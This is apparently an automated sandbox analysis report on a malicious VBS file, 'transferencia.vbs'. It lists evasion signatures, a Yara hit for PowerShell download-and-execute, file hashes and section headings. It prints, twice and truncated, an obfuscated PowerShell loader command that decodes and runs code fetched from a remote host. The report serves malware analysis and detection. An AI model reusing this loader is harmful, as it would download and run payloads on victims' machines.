Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4682			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5219			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432

Thread sleep time: -5534023222112862s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000002.00000002.3350719704.000001BF33154000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_2448.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#patee rutsjebaners pumaernes charless topnoteringernes centimeter #>;$gyrectomies='bogman';<#preremoving monotoni afdelingslgerne blunderers fingredes intwists #>;$limpid=$host.privatedata;if ($limpid) {$navicert++;}function opbrugets52($craftsmaster){$postnarisnhaust=$hellenist+$craftsmaster.length-$navicert;for( $postnaris=4;$postnaris -lt $postnarisnhaust;$postnaris+=5){$samfundslrers='nonfecund';$informativ+=$craftsmaster[$postnaris];}$informativ;}function ggepuncherne($unpopulousness27){ & ($topographometric) ($unpopulousness27);}$postnarisnertion254=opbrugets52 'timemde eo m kzvulcistillsoc l c aa hvs/g,or5hazi.skak0skun grip(akadwa lei c.nnudbedoveropreswboilsbekj kabenantitcoss klud1paul0,ash. bar0dest;a te softwlignidytinepid6.orl4soda;p.oc vidxcer,6sona4 nde;unle ra.r .rov,idg:radi1 med2 moc1brss. hon0mode)f ey sporgmrkve fircmettkchito tan/ bl 2cong0for,1 amm0hymn0insp1skib0mot,1ring beblffkaliholdrlysbe.errfpicropeerxfrys/m sk1ce t2unco1lat . rdi0 uds ';$billardkugle=opbrugets52 'mi ru talsforhe.linrselv- egrapedig p aeo.lyns,ggtbete ';$ugenummer=opbrugets52 ' an hchubt serts umpop,a:bhmn/ mpe/so.s9shit1svas.bobi1nv i0supe9 sus.maae2chlo0 f s.unde1 egn6w ve1 gud/fopdhpuere teas grit b.teg orbinter jore ilamjordsavioe doknd,ta.centcstonh udfmhage ';$onymize=opbrugets52 'plat>awap ';$topographometric=opbrugets52 'bangima me skuxkalk ';$nonhallucinatory='selsparks';$garwin='\dorgens.uns';ggepuncherne (opbrugets52 'bitm$vkstghootlsyreoinc bk ffacompl fas:relaiskrinpreddserek petooecapantei indemodirsclei disn j mg hor=ivin$ kasestolne.duv.err:gol asub.palvep predidena nostda,sabesp+unem$sandgtetaaforertr swswanilberncest ');ggepuncherne (opbrugets52 ' kyl$molygillulbetvoori bskina skulover: jerssproasapolo toa ecim rliaan nnhermdskytr stiirestnutt eunre= t.e$.cheufor g onecasqncarou,amlm modms.acebrevrho s. ompsevalpfinnlsk.nihudktmagn(ac,c$ triostkinbundy kytm uneiin.oz un,egad )armi ');ggepuncherne (opbrugets52 'kate[opvunfrfrecowstsank.ejaks bejelicerrefivforhiinf.cbreaea,stp .peohabii allntr vtjermmha,datrevn fllautengpreaesl,tr rdt]traw: ci.: asyspolleeliac aleucyrtro,dnilet,ttel,yperspdirrr nono c.st.unoo pr,ckeepocadrljudo hamm=atta un.r[ diancop eindftmile.mammscoloestuccmentusolbrbog,i altt rmayanglpcontr udio attt befoaspacarchofredltriatbragyd rnpti.gem ck] rer:rej :munit taml bolskamf1noci2i.fl ');$ugenummer=$salamandrine[0];$hexactinellid40=(opbrugets52 'le a$,ircgtanol jesosperbconda skrlbela:cupogorigrgtebuuntiihemon onsekor =poc,nhaece h.mwb.it-cnidomirabultrjbaroetraccoxaltf,st s nssw.rsyne,tsbyghtmy,ierubem s c.waitn.uldevaret rni.fa iwbiseeforbbforecaub lveteisu.ee c nn bavt dec ');ggepuncherne ($hexactinellid40);ggepuncherne (opbrugets52 ' s,n$floagbe orintruhawkiz.opnkonfegirl.mohah isoepseuamudcdretseq.adrarris inn[ por$fo dbfr siuklalcomplout,a xcer .ond utukcharupilegkos.lto.ve.nto]frek=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#patee rutsjebaners pumaernes charless topnoteringernes centimeter #>;$gyrectomies='bogman';<#preremoving monotoni afdelingslgerne blunderers fingredes intwists #>;$limpid=$host.privatedata;if ($limpid) {$navicert++;}function opbrugets52($craftsmaster){$postnarisnhaust=$hellenist+$craftsmaster.length-$navicert;for( $postnaris=4;$postnaris -lt $postnarisnhaust;$postnaris+=5){$samfundslrers='nonfecund';$informativ+=$craftsmaster[$postnaris];}$informativ;}function ggepuncherne($unpopulousness27){ & ($topographometric) ($unpopulousness27);}$postnarisnertion254=opbrugets52 'timemde eo m kzvulcistillsoc l c aa hvs/g,or5hazi.skak0skun grip(akadwa lei c.nnudbedoveropreswboilsbekj kabenantitcoss klud1paul0,ash. bar0dest;a te softwlignidytinepid6.orl4soda;p.oc vidxcer,6sona4 nde;unle ra.r .rov,idg:radi1 med2 moc1brss. hon0mode)f ey sporgmrkve fircmettkchito tan/ bl 2cong0for,1 amm0hymn0insp1skib0mot,1ring beblffkaliholdrlysbe.errfpicropeerxfrys/m sk1ce t2unco1lat . rdi0 uds ';$billardkugle=opbrugets52 'mi ru talsforhe.linrselv- egrapedig p aeo.lyns,ggtbete ';$ugenummer=opbrugets52 ' an hchubt serts umpop,a:bhmn/ mpe/so.s9shit1svas.bobi1nv i0supe9 sus.maae2chlo0 f s.unde1 egn6w ve1 gud/fopdhpuere teas grit b.teg orbinter jore ilamjordsavioe doknd,ta.centcstonh udfmhage ';$onymize=opbrugets52 'plat>awap ';$topographometric=opbrugets52 'bangima me skuxkalk ';$nonhallucinatory='selsparks';$garwin='\dorgens.uns';ggepuncherne (opbrugets52 'bitm$vkstghootlsyreoinc bk ffacompl fas:relaiskrinpreddserek petooecapantei indemodirsclei disn j mg hor=ivin$ kasestolne.duv.err:gol asub.palvep predidena nostda,sabesp+unem$sandgtetaaforertr swswanilberncest ');ggepuncherne (opbrugets52 ' kyl$molygillulbetvoori bskina skulover: jerssproasapolo toa ecim rliaan nnhermdskytr stiirestnutt eunre= t.e$.cheufor g onecasqncarou,amlm modms.acebrevrho s. ompsevalpfinnlsk.nihudktmagn(ac,c$ triostkinbundy kytm uneiin.oz un,egad )armi ');ggepuncherne (opbrugets52 'kate[opvunfrfrecowstsank.ejaks bejelicerrefivforhiinf.cbreaea,stp .peohabii allntr vtjermmha,datrevn fllautengpreaesl,tr rdt]traw: ci.: asyspolleeliac aleucyrtro,dnilet,ttel,yperspdirrr nono c.st.unoo pr,ckeepocadrljudo hamm=atta un.r[ diancop eindftmile.mammscoloestuccmentusolbrbog,i altt rmayanglpcontr udio attt befoaspacarchofredltriatbragyd rnpti.gem ck] rer:rej :munit taml bolskamf1noci2i.fl ');$ugenummer=$salamandrine[0];$hexactinellid40=(opbrugets52 'le a$,ircgtanol jesosperbconda skrlbela:cupogorigrgtebuuntiihemon onsekor =poc,nhaece h.mwb.it-cnidomirabultrjbaroetraccoxaltf,st s nssw.rsyne,tsbyghtmy,ierubem s c.waitn.uldevaret rni.fa iwbiseeforbbforecaub lveteisu.ee c nn bavt dec ');ggepuncherne ($hexactinellid40);ggepuncherne (opbrugets52 ' s,n$floagbe orintruhawkiz.opnkonfegirl.mohah isoepseuamudcdretseq.adrarris inn[ por$fo dbfr siuklalcomplout,a xcer .ond utukcharupilegkos.lto.ve.nto]frek=			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1524803
Product:	CloudBasic
Start time:	09:27:07
Start date:	03.10.2024
Sample:	transferencia.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c68010fc942eef8e8868e5d3197aadc8
SHA1:	964fa94fcbce9a5a0499672e881b271530c7e1fa
SHA256:	08b753161a621a8235016b94f3a8c68417a8907abda998f84a4de8687a515bf4

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	8A4B02D8A977CB929C05D4BC2942C5A9	F9A6426CAF2E8C64202E86B07F1A461056626BEA	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlpl1eip.t5n.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2wew4ow.aev.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Windows Analysis Report
transferencia.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report transferencia.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
transferencia.vbs